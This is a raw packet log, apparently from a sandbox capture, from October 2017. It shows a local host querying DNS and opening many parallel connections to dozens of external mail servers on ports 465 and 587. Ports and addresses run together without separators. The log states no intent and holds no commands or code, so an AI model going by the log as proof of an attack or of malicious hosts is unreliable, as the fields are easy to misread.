Okt 17, 2017 21:54:37.163999081 MESZ5938653192.168.1.168.8.8.8
Okt 17, 2017 21:54:37.280257940 MESZ53597848.8.8.8192.168.1.16
Okt 17, 2017 21:54:37.280328035 MESZ4654922985.124.51.105192.168.1.16
Okt 17, 2017 21:54:37.281732082 MESZ49231465192.168.1.16213.90.36.113
Okt 17, 2017 21:54:37.281785011 MESZ46549231213.90.36.113192.168.1.16
Okt 17, 2017 21:54:37.281884909 MESZ49231465192.168.1.16213.90.36.113
Okt 17, 2017 21:54:37.282394886 MESZ49231465192.168.1.16213.90.36.113
Okt 17, 2017 21:54:37.282424927 MESZ46549231213.90.36.113192.168.1.16
Okt 17, 2017 21:54:37.331927061 MESZ5874923091.198.169.21192.168.1.16
Okt 17, 2017 21:54:37.331970930 MESZ5874922785.13.152.217192.168.1.16
Okt 17, 2017 21:54:37.332870007 MESZ49230587192.168.1.1691.198.169.21
Okt 17, 2017 21:54:37.332895994 MESZ5874923091.198.169.21192.168.1.16
Okt 17, 2017 21:54:37.334181070 MESZ49230587192.168.1.1691.198.169.21
Okt 17, 2017 21:54:37.334201097 MESZ5874923091.198.169.21192.168.1.16
Okt 17, 2017 21:54:37.334925890 MESZ49227587192.168.1.1685.13.152.217
Okt 17, 2017 21:54:37.335036039 MESZ5874922785.13.152.217192.168.1.16
Okt 17, 2017 21:54:37.335711956 MESZ49227587192.168.1.1685.13.152.217
Okt 17, 2017 21:54:37.339093924 MESZ46549220195.4.92.210192.168.1.16
Okt 17, 2017 21:54:37.339257956 MESZ6023053192.168.1.168.8.8.8
Okt 17, 2017 21:54:37.339447021 MESZ49220465192.168.1.16195.4.92.210
Okt 17, 2017 21:54:37.339468002 MESZ46549220195.4.92.210192.168.1.16
Okt 17, 2017 21:54:37.339631081 MESZ49220465192.168.1.16195.4.92.210
Okt 17, 2017 21:54:37.339680910 MESZ46549220195.4.92.210192.168.1.16
Okt 17, 2017 21:54:37.343180895 MESZ5227253192.168.1.168.8.8.8
Okt 17, 2017 21:54:37.343275070 MESZ49220465192.168.1.16195.4.92.210
Okt 17, 2017 21:54:37.366281986 MESZ46549196108.167.137.14192.168.1.16
Okt 17, 2017 21:54:37.367389917 MESZ49196465192.168.1.16108.167.137.14
Okt 17, 2017 21:54:37.367424011 MESZ46549196108.167.137.14192.168.1.16
Okt 17, 2017 21:54:37.368287086 MESZ49196465192.168.1.16108.167.137.14
Okt 17, 2017 21:54:37.368308067 MESZ46549196108.167.137.14192.168.1.16
Okt 17, 2017 21:54:37.368501902 MESZ49196465192.168.1.16108.167.137.14
Okt 17, 2017 21:54:37.368524075 MESZ46549196108.167.137.14192.168.1.16
Okt 17, 2017 21:54:37.368844986 MESZ49196465192.168.1.16108.167.137.14
Okt 17, 2017 21:54:37.368872881 MESZ46549196108.167.137.14192.168.1.16
Okt 17, 2017 21:54:37.490705967 MESZ49229465192.168.1.1685.124.51.105
Okt 17, 2017 21:54:37.490741968 MESZ4654922985.124.51.105192.168.1.16
Okt 17, 2017 21:54:37.491441011 MESZ49229465192.168.1.1685.124.51.105
Okt 17, 2017 21:54:37.491473913 MESZ4654922985.124.51.105192.168.1.16
Okt 17, 2017 21:54:37.492052078 MESZ49229465192.168.1.1685.124.51.105
Okt 17, 2017 21:54:37.492079973 MESZ4654922985.124.51.105192.168.1.16
Okt 17, 2017 21:54:37.512166977 MESZ5874923091.198.169.21192.168.1.16
Okt 17, 2017 21:54:37.515129089 MESZ49230587192.168.1.1691.198.169.21
Okt 17, 2017 21:54:37.515249014 MESZ5874923091.198.169.21192.168.1.16
Okt 17, 2017 21:54:37.516597986 MESZ49230587192.168.1.1691.198.169.21
Okt 17, 2017 21:54:37.522598982 MESZ5498153192.168.1.168.8.8.8
Okt 17, 2017 21:54:37.607722998 MESZ53593868.8.8.8192.168.1.16
Okt 17, 2017 21:54:37.608577013 MESZ49232587192.168.1.1685.13.134.71
Okt 17, 2017 21:54:37.608608961 MESZ5874923285.13.134.71192.168.1.16
Okt 17, 2017 21:54:37.608966112 MESZ49232587192.168.1.1685.13.134.71
Okt 17, 2017 21:54:37.661278963 MESZ4654922985.124.51.105192.168.1.16
Okt 17, 2017 21:54:37.661815882 MESZ49229465192.168.1.1685.124.51.105
Okt 17, 2017 21:54:37.661844015 MESZ4654922985.124.51.105192.168.1.16
Okt 17, 2017 21:54:37.661952019 MESZ49229465192.168.1.1685.124.51.105
Okt 17, 2017 21:54:37.661967993 MESZ4654922985.124.51.105192.168.1.16
Okt 17, 2017 21:54:37.749912024 MESZ5874920840.101.48.82192.168.1.16
Okt 17, 2017 21:54:37.750138998 MESZ49208587192.168.1.1640.101.48.82
Okt 17, 2017 21:54:37.750163078 MESZ5874920840.101.48.82192.168.1.16
Okt 17, 2017 21:54:37.750277996 MESZ49208587192.168.1.1640.101.48.82
Okt 17, 2017 21:54:37.750333071 MESZ5874920840.101.48.82192.168.1.16
Okt 17, 2017 21:54:37.750977039 MESZ49208587192.168.1.1640.101.48.82
Okt 17, 2017 21:54:37.754550934 MESZ4931153192.168.1.168.8.8.8
Okt 17, 2017 21:54:37.789937973 MESZ53602308.8.8.8192.168.1.16
Okt 17, 2017 21:54:37.790669918 MESZ49233587192.168.1.16213.186.33.155
Okt 17, 2017 21:54:37.790699005 MESZ58749233213.186.33.155192.168.1.16
Okt 17, 2017 21:54:37.790764093 MESZ49233587192.168.1.16213.186.33.155
Okt 17, 2017 21:54:37.830663919 MESZ46549196108.167.137.14192.168.1.16
Okt 17, 2017 21:54:37.830935955 MESZ49196465192.168.1.16108.167.137.14
Okt 17, 2017 21:54:37.830960035 MESZ46549196108.167.137.14192.168.1.16
Okt 17, 2017 21:54:37.831283092 MESZ49196465192.168.1.16108.167.137.14
Okt 17, 2017 21:54:37.831300974 MESZ46549196108.167.137.14192.168.1.16
Okt 17, 2017 21:54:37.852730989 MESZ4654922985.124.51.105192.168.1.16
Okt 17, 2017 21:54:37.852974892 MESZ49229465192.168.1.1685.124.51.105
Okt 17, 2017 21:54:37.852997065 MESZ4654922985.124.51.105192.168.1.16
Okt 17, 2017 21:54:37.853108883 MESZ49229465192.168.1.1685.124.51.105
Okt 17, 2017 21:54:37.853173018 MESZ4654922985.124.51.105192.168.1.16
Okt 17, 2017 21:54:37.853720903 MESZ49229465192.168.1.1685.124.51.105
Okt 17, 2017 21:54:37.860558987 MESZ5508153192.168.1.168.8.8.8
Okt 17, 2017 21:54:37.896648884 MESZ5874920940.101.48.82192.168.1.16
Okt 17, 2017 21:54:37.896869898 MESZ49209587192.168.1.1640.101.48.82
Okt 17, 2017 21:54:37.896894932 MESZ5874920940.101.48.82192.168.1.16
Okt 17, 2017 21:54:37.896998882 MESZ49209587192.168.1.1640.101.48.82
Okt 17, 2017 21:54:37.897053003 MESZ5874920940.101.48.82192.168.1.16
Okt 17, 2017 21:54:37.897517920 MESZ49209587192.168.1.1640.101.48.82
Okt 17, 2017 21:54:37.932879925 MESZ5267853192.168.1.168.8.8.8
Okt 17, 2017 21:54:37.963964939 MESZ58749233213.186.33.155192.168.1.16
Okt 17, 2017 21:54:38.001272917 MESZ53522728.8.8.8192.168.1.16
Okt 17, 2017 21:54:38.001996994 MESZ49234465192.168.1.1688.198.199.114
Okt 17, 2017 21:54:38.002027035 MESZ4654923488.198.199.114192.168.1.16
Okt 17, 2017 21:54:38.004504919 MESZ49234465192.168.1.1688.198.199.114
Okt 17, 2017 21:54:38.004755974 MESZ49234465192.168.1.1688.198.199.114
Okt 17, 2017 21:54:38.004774094 MESZ4654923488.198.199.114192.168.1.16
Okt 17, 2017 21:54:38.076292038 MESZ5874921040.101.48.82192.168.1.16
Okt 17, 2017 21:54:38.076649904 MESZ49210587192.168.1.1640.101.48.82
Okt 17, 2017 21:54:38.076669931 MESZ5874921040.101.48.82192.168.1.16
Okt 17, 2017 21:54:38.076796055 MESZ49210587192.168.1.1640.101.48.82
Okt 17, 2017 21:54:38.076853991 MESZ5874921040.101.48.82192.168.1.16
Okt 17, 2017 21:54:38.077158928 MESZ49210587192.168.1.1640.101.48.82
Okt 17, 2017 21:54:38.081823111 MESZ6068853192.168.1.168.8.8.8
Okt 17, 2017 21:54:38.097083092 MESZ53549818.8.8.8192.168.1.16
Okt 17, 2017 21:54:38.099288940 MESZ49235587192.168.1.16195.250.38.66
Okt 17, 2017 21:54:38.099361897 MESZ58749235195.250.38.66192.168.1.16
Okt 17, 2017 21:54:38.099644899 MESZ49235587192.168.1.16195.250.38.66
Okt 17, 2017 21:54:38.156486034 MESZ4654923488.198.199.114192.168.1.16
Okt 17, 2017 21:54:38.156511068 MESZ4654923488.198.199.114192.168.1.16
Okt 17, 2017 21:54:38.156662941 MESZ49234465192.168.1.1688.198.199.114
Okt 17, 2017 21:54:38.161107063 MESZ49234465192.168.1.1688.198.199.114
Okt 17, 2017 21:54:38.161124945 MESZ4654923488.198.199.114192.168.1.16
Okt 17, 2017 21:54:38.164479017 MESZ58749233213.186.33.155192.168.1.16
Okt 17, 2017 21:54:38.164616108 MESZ49233587192.168.1.16213.186.33.155
Okt 17, 2017 21:54:38.188313007 MESZ53493118.8.8.8192.168.1.16
Okt 17, 2017 21:54:38.189914942 MESZ49236465192.168.1.16193.17.223.40
Okt 17, 2017 21:54:38.189968109 MESZ46549236193.17.223.40192.168.1.16
Okt 17, 2017 21:54:38.190073013 MESZ49236465192.168.1.16193.17.223.40
Okt 17, 2017 21:54:38.190584898 MESZ49236465192.168.1.16193.17.223.40
Okt 17, 2017 21:54:38.190614939 MESZ46549236193.17.223.40192.168.1.16
Okt 17, 2017 21:54:38.278093100 MESZ46549196108.167.137.14192.168.1.16
Okt 17, 2017 21:54:38.278302908 MESZ49196465192.168.1.16108.167.137.14
Okt 17, 2017 21:54:38.278323889 MESZ46549196108.167.137.14192.168.1.16
Okt 17, 2017 21:54:38.278760910 MESZ49196465192.168.1.16108.167.137.14
Okt 17, 2017 21:54:38.278778076 MESZ46549196108.167.137.14192.168.1.16
Okt 17, 2017 21:54:38.291558027 MESZ5874920640.101.48.82192.168.1.16
Okt 17, 2017 21:54:38.291836977 MESZ49206587192.168.1.1640.101.48.82
Okt 17, 2017 21:54:38.291861057 MESZ5874920640.101.48.82192.168.1.16
Okt 17, 2017 21:54:38.291975021 MESZ49206587192.168.1.1640.101.48.82
Okt 17, 2017 21:54:38.292037010 MESZ5874920640.101.48.82192.168.1.16
Okt 17, 2017 21:54:38.292495012 MESZ49206587192.168.1.1640.101.48.82
Okt 17, 2017 21:54:38.297322989 MESZ6262353192.168.1.168.8.8.8
Okt 17, 2017 21:54:38.316471100 MESZ53550818.8.8.8192.168.1.16
Okt 17, 2017 21:54:38.317260027 MESZ49237465192.168.1.1691.106.125.115
Okt 17, 2017 21:54:38.317289114 MESZ4654923791.106.125.115192.168.1.16
Okt 17, 2017 21:54:38.317374945 MESZ49237465192.168.1.1691.106.125.115
Okt 17, 2017 21:54:38.317656040 MESZ49237465192.168.1.1691.106.125.115
Okt 17, 2017 21:54:38.317672968 MESZ4654923791.106.125.115192.168.1.16
Okt 17, 2017 21:54:38.333848000 MESZ4654923488.198.199.114192.168.1.16
Okt 17, 2017 21:54:38.409684896 MESZ4654922582.207.178.23192.168.1.16
Okt 17, 2017 21:54:38.409708023 MESZ4654922582.207.178.23192.168.1.16
Okt 17, 2017 21:54:38.409821987 MESZ49225465192.168.1.1682.207.178.23
Okt 17, 2017 21:54:38.434489012 MESZ4654922582.207.178.23192.168.1.16
Okt 17, 2017 21:54:38.434511900 MESZ4654922582.207.178.23192.168.1.16
Okt 17, 2017 21:54:38.434520006 MESZ4654922582.207.178.23192.168.1.16
Okt 17, 2017 21:54:38.434632063 MESZ49225465192.168.1.1682.207.178.23
Okt 17, 2017 21:54:38.453708887 MESZ49225465192.168.1.1682.207.178.23
Okt 17, 2017 21:54:38.453730106 MESZ4654922582.207.178.23192.168.1.16
Okt 17, 2017 21:54:38.476599932 MESZ53606888.8.8.8192.168.1.16
Okt 17, 2017 21:54:38.477406979 MESZ49238587192.168.1.16213.90.36.9
Okt 17, 2017 21:54:38.477442026 MESZ58749238213.90.36.9192.168.1.16
Okt 17, 2017 21:54:38.478441954 MESZ49238587192.168.1.16213.90.36.9
Okt 17, 2017 21:54:38.524883986 MESZ4654923791.106.125.115192.168.1.16
Okt 17, 2017 21:54:38.536492109 MESZ4654923488.198.199.114192.168.1.16
Okt 17, 2017 21:54:38.536614895 MESZ49234465192.168.1.1688.198.199.114
Okt 17, 2017 21:54:38.536716938 MESZ49234465192.168.1.1688.198.199.114
Okt 17, 2017 21:54:38.536731005 MESZ4654923488.198.199.114192.168.1.16
Okt 17, 2017 21:54:38.537126064 MESZ49234465192.168.1.1688.198.199.114
Okt 17, 2017 21:54:38.537151098 MESZ4654923488.198.199.114192.168.1.16
Okt 17, 2017 21:54:38.607454062 MESZ53526788.8.8.8192.168.1.16
Okt 17, 2017 21:54:38.608051062 MESZ49239465192.168.1.16194.232.25.64
Okt 17, 2017 21:54:38.608074903 MESZ46549239194.232.25.64192.168.1.16
Okt 17, 2017 21:54:38.608520031 MESZ49239465192.168.1.16194.232.25.64
Okt 17, 2017 21:54:38.608768940 MESZ49239465192.168.1.16194.232.25.64
Okt 17, 2017 21:54:38.608784914 MESZ46549239194.232.25.64192.168.1.16
Okt 17, 2017 21:54:38.642580986 MESZ58749235195.250.38.66192.168.1.16
Okt 17, 2017 21:54:38.642976999 MESZ49235587192.168.1.16195.250.38.66
Okt 17, 2017 21:54:38.642993927 MESZ58749235195.250.38.66192.168.1.16
Okt 17, 2017 21:54:38.643759012 MESZ49235587192.168.1.16195.250.38.66
Okt 17, 2017 21:54:38.643784046 MESZ58749235195.250.38.66192.168.1.16
Okt 17, 2017 21:54:38.705463886 MESZ4654922582.207.178.23192.168.1.16
Okt 17, 2017 21:54:38.705863953 MESZ49225465192.168.1.1682.207.178.23
Okt 17, 2017 21:54:38.705879927 MESZ4654922582.207.178.23192.168.1.16
Okt 17, 2017 21:54:38.706990957 MESZ49225465192.168.1.1682.207.178.23
Okt 17, 2017 21:54:38.707015991 MESZ4654922582.207.178.23192.168.1.16
Okt 17, 2017 21:54:38.719721079 MESZ46549196108.167.137.14192.168.1.16
Okt 17, 2017 21:54:38.719933987 MESZ49196465192.168.1.16108.167.137.14
Okt 17, 2017 21:54:38.719957113 MESZ46549196108.167.137.14192.168.1.16
Okt 17, 2017 21:54:38.721394062 MESZ49196465192.168.1.16108.167.137.14
Okt 17, 2017 21:54:38.721412897 MESZ46549196108.167.137.14192.168.1.16
Okt 17, 2017 21:54:38.728477955 MESZ4654923791.106.125.115192.168.1.16
Okt 17, 2017 21:54:38.728600025 MESZ49237465192.168.1.1691.106.125.115
Okt 17, 2017 21:54:38.729547024 MESZ49237465192.168.1.1691.106.125.115
Okt 17, 2017 21:54:38.729562044 MESZ4654923791.106.125.115192.168.1.16
Okt 17, 2017 21:54:38.748543978 MESZ4654923488.198.199.114192.168.1.16
Okt 17, 2017 21:54:38.748769999 MESZ49234465192.168.1.1688.198.199.114
Okt 17, 2017 21:54:38.748791933 MESZ4654923488.198.199.114192.168.1.16
Okt 17, 2017 21:54:38.750098944 MESZ49234465192.168.1.1688.198.199.114
Okt 17, 2017 21:54:38.750117064 MESZ4654923488.198.199.114192.168.1.16
Okt 17, 2017 21:54:38.890049934 MESZ58749235195.250.38.66192.168.1.16
Okt 17, 2017 21:54:38.891299963 MESZ49235587192.168.1.16195.250.38.66
Okt 17, 2017 21:54:38.891330957 MESZ58749235195.250.38.66192.168.1.16
Okt 17, 2017 21:54:38.891519070 MESZ49235587192.168.1.16195.250.38.66
Okt 17, 2017 21:54:38.891541958 MESZ58749235195.250.38.66192.168.1.16
Okt 17, 2017 21:54:38.917887926 MESZ5874923285.13.134.71192.168.1.16
Okt 17, 2017 21:54:38.919579029 MESZ49232587192.168.1.1685.13.134.71
Okt 17, 2017 21:54:38.919611931 MESZ5874923285.13.134.71192.168.1.16
Okt 17, 2017 21:54:38.919797897 MESZ49232587192.168.1.1685.13.134.71
Okt 17, 2017 21:54:38.919821024 MESZ5874923285.13.134.71192.168.1.16
Okt 17, 2017 21:54:38.924998999 MESZ53626238.8.8.8192.168.1.16
Okt 17, 2017 21:54:38.926145077 MESZ49240587192.168.1.1664.29.151.235
Okt 17, 2017 21:54:38.926187992 MESZ5874924064.29.151.235192.168.1.16
Okt 17, 2017 21:54:38.926323891 MESZ49240587192.168.1.1664.29.151.235
Okt 17, 2017 21:54:38.935525894 MESZ4654922582.207.178.23192.168.1.16
Okt 17, 2017 21:54:38.935762882 MESZ49225465192.168.1.1682.207.178.23
Okt 17, 2017 21:54:38.935789108 MESZ4654922582.207.178.23192.168.1.16
Okt 17, 2017 21:54:38.937357903 MESZ49225465192.168.1.1682.207.178.23
Okt 17, 2017 21:54:38.937376976 MESZ4654922582.207.178.23192.168.1.16
Okt 17, 2017 21:54:38.958009958 MESZ4654923488.198.199.114192.168.1.16
Okt 17, 2017 21:54:38.958214998 MESZ49234465192.168.1.1688.198.199.114
Okt 17, 2017 21:54:38.958233118 MESZ4654923488.198.199.114192.168.1.16
Okt 17, 2017 21:54:38.959197044 MESZ49234465192.168.1.1688.198.199.114
Okt 17, 2017 21:54:38.959208012 MESZ4654923488.198.199.114192.168.1.16
Okt 17, 2017 21:54:38.959979057 MESZ4654923791.106.125.115192.168.1.16
Okt 17, 2017 21:54:38.965193033 MESZ58749238213.90.36.9192.168.1.16
Okt 17, 2017 21:54:38.966020107 MESZ49237465192.168.1.1691.106.125.115
Okt 17, 2017 21:54:38.966059923 MESZ4654923791.106.125.115192.168.1.16
Okt 17, 2017 21:54:38.967380047 MESZ49237465192.168.1.1691.106.125.115
Okt 17, 2017 21:54:38.967400074 MESZ4654923791.106.125.115192.168.1.16
Okt 17, 2017 21:54:38.967669964 MESZ49238587192.168.1.16213.90.36.9
Okt 17, 2017 21:54:38.967681885 MESZ58749238213.90.36.9192.168.1.16
Okt 17, 2017 21:54:38.967766047 MESZ49238587192.168.1.16213.90.36.9
Okt 17, 2017 21:54:38.967777967 MESZ58749238213.90.36.9192.168.1.16
Okt 17, 2017 21:54:38.986855030 MESZ46549196108.167.137.14192.168.1.16
Okt 17, 2017 21:54:38.987096071 MESZ49196465192.168.1.16108.167.137.14
Okt 17, 2017 21:54:38.987117052 MESZ46549196108.167.137.14192.168.1.16
Okt 17, 2017 21:54:38.987598896 MESZ49196465192.168.1.16108.167.137.14
Okt 17, 2017 21:54:38.987610102 MESZ46549196108.167.137.14192.168.1.16
Okt 17, 2017 21:54:38.988190889 MESZ49196465192.168.1.16108.167.137.14
Okt 17, 2017 21:54:38.988213062 MESZ46549196108.167.137.14192.168.1.16
Okt 17, 2017 21:54:39.018433094 MESZ46549239194.232.25.64192.168.1.16
Okt 17, 2017 21:54:39.018476009 MESZ46549239194.232.25.64192.168.1.16
Okt 17, 2017 21:54:39.018485069 MESZ46549239194.232.25.64192.168.1.16
Okt 17, 2017 21:54:39.018627882 MESZ49239465192.168.1.16194.232.25.64
Okt 17, 2017 21:54:39.025527954 MESZ46549239194.232.25.64192.168.1.16
Okt 17, 2017 21:54:39.036662102 MESZ49239465192.168.1.16194.232.25.64
Okt 17, 2017 21:54:39.036683083 MESZ46549239194.232.25.64192.168.1.16
Okt 17, 2017 21:54:39.048718929 MESZ5874923285.13.134.71192.168.1.16
Okt 17, 2017 21:54:39.050331116 MESZ49232587192.168.1.1685.13.134.71
Okt 17, 2017 21:54:39.050345898 MESZ5874923285.13.134.71192.168.1.16
Okt 17, 2017 21:54:39.050458908 MESZ49232587192.168.1.1685.13.134.71
Okt 17, 2017 21:54:39.050471067 MESZ5874923285.13.134.71192.168.1.16
Okt 17, 2017 21:54:39.089196920 MESZ4654923488.198.199.114192.168.1.16
Okt 17, 2017 21:54:39.089493990 MESZ49234465192.168.1.1688.198.199.114
Okt 17, 2017 21:54:39.089514971 MESZ4654923488.198.199.114192.168.1.16
Okt 17, 2017 21:54:39.089672089 MESZ49234465192.168.1.1688.198.199.114
Okt 17, 2017 21:54:39.089735985 MESZ4654923488.198.199.114192.168.1.16
Okt 17, 2017 21:54:39.089812994 MESZ49234465192.168.1.1688.198.199.114
Okt 17, 2017 21:54:39.107225895 MESZ6193053192.168.1.168.8.8.8
Okt 17, 2017 21:54:39.133261919 MESZ58749238213.90.36.9192.168.1.16
Okt 17, 2017 21:54:39.137967110 MESZ49238587192.168.1.16213.90.36.9
Okt 17, 2017 21:54:39.138001919 MESZ58749238213.90.36.9192.168.1.16
Okt 17, 2017 21:54:39.138123989 MESZ49238587192.168.1.16213.90.36.9
Okt 17, 2017 21:54:39.138139009 MESZ58749238213.90.36.9192.168.1.16
Okt 17, 2017 21:54:39.167289972 MESZ4654922582.207.178.23192.168.1.16
Okt 17, 2017 21:54:39.167495966 MESZ49225465192.168.1.1682.207.178.23
Okt 17, 2017 21:54:39.167525053 MESZ4654922582.207.178.23192.168.1.16
Okt 17, 2017 21:54:39.167623043 MESZ49225465192.168.1.1682.207.178.23
Okt 17, 2017 21:54:39.167637110 MESZ4654922582.207.178.23192.168.1.16
Okt 17, 2017 21:54:39.174391031 MESZ58749235195.250.38.66192.168.1.16
Okt 17, 2017 21:54:39.175335884 MESZ49235587192.168.1.16195.250.38.66
Okt 17, 2017 21:54:39.175364971 MESZ58749235195.250.38.66192.168.1.16
Okt 17, 2017 21:54:39.175607920 MESZ49235587192.168.1.16195.250.38.66
Okt 17, 2017 21:54:39.175622940 MESZ58749235195.250.38.66192.168.1.16
Okt 17, 2017 21:54:39.205481052 MESZ46549239194.232.25.64192.168.1.16
Okt 17, 2017 21:54:39.318023920 MESZ5874923285.13.134.71192.168.1.16
Okt 17, 2017 21:54:39.318957090 MESZ49232587192.168.1.1685.13.134.71
Okt 17, 2017 21:54:39.318994045 MESZ5874923285.13.134.71192.168.1.16
Okt 17, 2017 21:54:39.319329977 MESZ49232587192.168.1.1685.13.134.71
Okt 17, 2017 21:54:39.319355011 MESZ5874923285.13.134.71192.168.1.16
Okt 17, 2017 21:54:39.319626093 MESZ4654923791.106.125.115192.168.1.16
Okt 17, 2017 21:54:39.319922924 MESZ49237465192.168.1.1691.106.125.115
Okt 17, 2017 21:54:39.319956064 MESZ4654923791.106.125.115192.168.1.16
Okt 17, 2017 21:54:39.320229053 MESZ49237465192.168.1.1691.106.125.115
Okt 17, 2017 21:54:39.320252895 MESZ4654923791.106.125.115192.168.1.16
Okt 17, 2017 21:54:39.355400085 MESZ58749238213.90.36.9192.168.1.16
Okt 17, 2017 21:54:39.356605053 MESZ49238587192.168.1.16213.90.36.9
Okt 17, 2017 21:54:39.356642962 MESZ58749238213.90.36.9192.168.1.16
Okt 17, 2017 21:54:39.408478022 MESZ46549239194.232.25.64192.168.1.16
Okt 17, 2017 21:54:39.408567905 MESZ49239465192.168.1.16194.232.25.64
Okt 17, 2017 21:54:39.408770084 MESZ46549196108.167.137.14192.168.1.16
Okt 17, 2017 21:54:39.408772945 MESZ49239465192.168.1.16194.232.25.64
Okt 17, 2017 21:54:39.408795118 MESZ46549239194.232.25.64192.168.1.16
Okt 17, 2017 21:54:39.409033060 MESZ49239465192.168.1.16194.232.25.64
Okt 17, 2017 21:54:39.409059048 MESZ46549239194.232.25.64192.168.1.16
Okt 17, 2017 21:54:39.409362078 MESZ49196465192.168.1.16108.167.137.14
Okt 17, 2017 21:54:39.409389019 MESZ46549196108.167.137.14192.168.1.16
Okt 17, 2017 21:54:39.409538984 MESZ49196465192.168.1.16108.167.137.14
Okt 17, 2017 21:54:39.409559011 MESZ46549196108.167.137.14192.168.1.16
Okt 17, 2017 21:54:39.422228098 MESZ53619308.8.8.8192.168.1.16
Okt 17, 2017 21:54:39.423048019 MESZ49241587192.168.1.1637.9.169.18
Okt 17, 2017 21:54:39.423082113 MESZ5874924137.9.169.18192.168.1.16
Okt 17, 2017 21:54:39.423141003 MESZ49241587192.168.1.1637.9.169.18
Okt 17, 2017 21:54:39.486263037 MESZ58749238213.90.36.9192.168.1.16
Okt 17, 2017 21:54:39.486284971 MESZ58749238213.90.36.9192.168.1.16
Okt 17, 2017 21:54:39.486293077 MESZ58749238213.90.36.9192.168.1.16
Okt 17, 2017 21:54:39.486489058 MESZ49238587192.168.1.16213.90.36.9
Okt 17, 2017 21:54:39.512188911 MESZ58749238213.90.36.9192.168.1.16
Okt 17, 2017 21:54:39.519396067 MESZ58749235195.250.38.66192.168.1.16
Okt 17, 2017 21:54:39.519427061 MESZ5874923285.13.134.71192.168.1.16
Okt 17, 2017 21:54:39.522068024 MESZ49235587192.168.1.16195.250.38.66
Okt 17, 2017 21:54:39.522192001 MESZ58749235195.250.38.66192.168.1.16
Okt 17, 2017 21:54:39.522325039 MESZ49235587192.168.1.16195.250.38.66
Okt 17, 2017 21:54:39.525357962 MESZ49232587192.168.1.1685.13.134.71
Okt 17, 2017 21:54:39.525470972 MESZ5874923285.13.134.71192.168.1.16
Okt 17, 2017 21:54:39.525602102 MESZ49232587192.168.1.1685.13.134.71
Okt 17, 2017 21:54:39.526572943 MESZ58749238213.90.36.9192.168.1.16
Okt 17, 2017 21:54:39.526724100 MESZ49238587192.168.1.16213.90.36.9
Okt 17, 2017 21:54:39.526758909 MESZ58749238213.90.36.9192.168.1.16
Okt 17, 2017 21:54:39.549601078 MESZ46549239194.232.25.64192.168.1.16
Okt 17, 2017 21:54:39.551562071 MESZ46549236193.17.223.40192.168.1.16
Okt 17, 2017 21:54:39.551584005 MESZ46549236193.17.223.40192.168.1.16
Okt 17, 2017 21:54:39.551593065 MESZ46549236193.17.223.40192.168.1.16
Okt 17, 2017 21:54:39.551688910 MESZ49236465192.168.1.16193.17.223.40
Okt 17, 2017 21:54:39.556709051 MESZ46549236193.17.223.40192.168.1.16
Okt 17, 2017 21:54:39.569833040 MESZ49239465192.168.1.16194.232.25.64
Okt 17, 2017 21:54:39.569852114 MESZ46549239194.232.25.64192.168.1.16
Okt 17, 2017 21:54:39.570123911 MESZ49239465192.168.1.16194.232.25.64
Okt 17, 2017 21:54:39.570137978 MESZ46549239194.232.25.64192.168.1.16
Okt 17, 2017 21:54:39.618007898 MESZ6049953192.168.1.168.8.8.8
Okt 17, 2017 21:54:39.620553017 MESZ5512553192.168.1.168.8.8.8
Okt 17, 2017 21:54:39.635116100 MESZ4654922582.207.178.23192.168.1.16
Okt 17, 2017 21:54:39.635304928 MESZ49225465192.168.1.1682.207.178.23
Okt 17, 2017 21:54:39.635324001 MESZ4654922582.207.178.23192.168.1.16
Okt 17, 2017 21:54:39.635473013 MESZ49225465192.168.1.1682.207.178.23
Okt 17, 2017 21:54:39.666569948 MESZ5670953192.168.1.168.8.8.8
Okt 17, 2017 21:54:39.678070068 MESZ49238587192.168.1.16213.90.36.9
Okt 17, 2017 21:54:39.678092003 MESZ58749238213.90.36.9192.168.1.16
Okt 17, 2017 21:54:39.690969944 MESZ4654923791.106.125.115192.168.1.16
Okt 17, 2017 21:54:39.691257954 MESZ49237465192.168.1.1691.106.125.115
Okt 17, 2017 21:54:39.691278934 MESZ4654923791.106.125.115192.168.1.16
Okt 17, 2017 21:54:39.691385031 MESZ49237465192.168.1.1691.106.125.115
Okt 17, 2017 21:54:39.691397905 MESZ4654923791.106.125.115192.168.1.16
Okt 17, 2017 21:54:39.756496906 MESZ49236465192.168.1.16193.17.223.40
Okt 17, 2017 21:54:39.756527901 MESZ46549236193.17.223.40192.168.1.16
Okt 17, 2017 21:54:39.762356997 MESZ49236465192.168.1.16193.17.223.40
Okt 17, 2017 21:54:39.762398005 MESZ46549236193.17.223.40192.168.1.16
Okt 17, 2017 21:54:39.768137932 MESZ46549239194.232.25.64192.168.1.16
Okt 17, 2017 21:54:39.768312931 MESZ49239465192.168.1.16194.232.25.64
Okt 17, 2017 21:54:39.768331051 MESZ46549239194.232.25.64192.168.1.16
Okt 17, 2017 21:54:39.768425941 MESZ49239465192.168.1.16194.232.25.64
Okt 17, 2017 21:54:39.768443108 MESZ46549239194.232.25.64192.168.1.16
Okt 17, 2017 21:54:39.831814051 MESZ5874924137.9.169.18192.168.1.16
Okt 17, 2017 21:54:39.832637072 MESZ49241587192.168.1.1637.9.169.18
Okt 17, 2017 21:54:39.832653999 MESZ5874924137.9.169.18192.168.1.16
Okt 17, 2017 21:54:39.832756996 MESZ49241587192.168.1.1637.9.169.18
Okt 17, 2017 21:54:39.832767963 MESZ5874924137.9.169.18192.168.1.16
Okt 17, 2017 21:54:39.913963079 MESZ46549196108.167.137.14192.168.1.16
Okt 17, 2017 21:54:39.914227962 MESZ49196465192.168.1.16108.167.137.14
Okt 17, 2017 21:54:39.914244890 MESZ46549196108.167.137.14192.168.1.16
Okt 17, 2017 21:54:39.914324045 MESZ49196465192.168.1.16108.167.137.14
Okt 17, 2017 21:54:39.914335966 MESZ46549196108.167.137.14192.168.1.16
Okt 17, 2017 21:54:39.921540022 MESZ58749214213.186.33.20192.168.1.16
Okt 17, 2017 21:54:39.922384977 MESZ49214587192.168.1.16213.186.33.20
Okt 17, 2017 21:54:39.922408104 MESZ58749214213.186.33.20192.168.1.16
Okt 17, 2017 21:54:39.922508955 MESZ49214587192.168.1.16213.186.33.20
Okt 17, 2017 21:54:39.922523975 MESZ58749214213.186.33.20192.168.1.16
Okt 17, 2017 21:54:39.933840036 MESZ53604998.8.8.8192.168.1.16
Okt 17, 2017 21:54:39.933886051 MESZ58749238213.90.36.9192.168.1.16
Okt 17, 2017 21:54:39.935158968 MESZ49242465192.168.1.1694.23.80.86
Okt 17, 2017 21:54:39.935211897 MESZ4654924294.23.80.86192.168.1.16
Okt 17, 2017 21:54:39.935313940 MESZ49242465192.168.1.1694.23.80.86
